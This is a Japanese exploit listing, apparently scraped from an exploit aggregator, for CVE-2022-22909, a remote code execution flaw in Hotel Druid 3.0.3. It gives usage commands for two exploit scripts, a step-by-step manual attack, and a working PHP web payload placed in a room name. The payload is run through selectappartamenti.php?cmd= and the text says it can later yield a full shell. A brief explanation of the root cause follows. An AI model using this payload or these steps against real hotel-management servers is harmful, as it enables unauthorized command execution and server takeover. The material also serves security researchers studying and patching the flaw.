## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-KAAL18-CVE-2022-22909
# CVE-2022-22909 Hotel Druid 3.0.3 - リモートコード実行 (RCE)
## kaal によるエクスプロイト
### エクスプロイト
1. HotelDruidExploit.py
このエクスプロイトは、PHP ペイロードをルーム名として新しいルームを作成します。
使用方法 : `$ ./HotelDruidExploit.py -h`

`$ ./HotelDruidExploit.py -u http://127.0.0.1/hoteldruid`

* * *
2. HotelDruidExploitRoom.py
このエクスプロイトは、ルーム名を既に知っている場合に動作します。
使用方法 : `$ ./HotelDruidExploitRoom.py -u "http://127.0.0.1/hoteldruid" -r "abc"`

* * *
## エクスプロイトの手順 :
1). Hotel Druid ページに移動します。
2). Tables -> Rooms をクリックします。

3). Create New Room フィールドに以下の PHP コードを追加し、Add をクリックします。
`{${system($_REQUEST[cmd])}}`

4). 「Room」名フィールドにペイロードを含む新しいルームが表示されます。

5). 以下のリンクにアクセスするとコマンド実行ができ、後でフルシェルを取得できます。
http://127.0.0.1/hoteldruid/dati/selectappartamenti.php?cmd=whoami
注 : IP を hoteldruid ターゲットの IP に変更してください。
## 脆弱性の説明 :
この脆弱性は、ルーム名が `/var/www/html/hoteldruid/dati/selectappartamenti.php` 内に保存されるために発生します。

そして `selectappartamenti.php` は PHP ファイルであるため、そのファイル内の PHP コードはサーバーによって実行されます。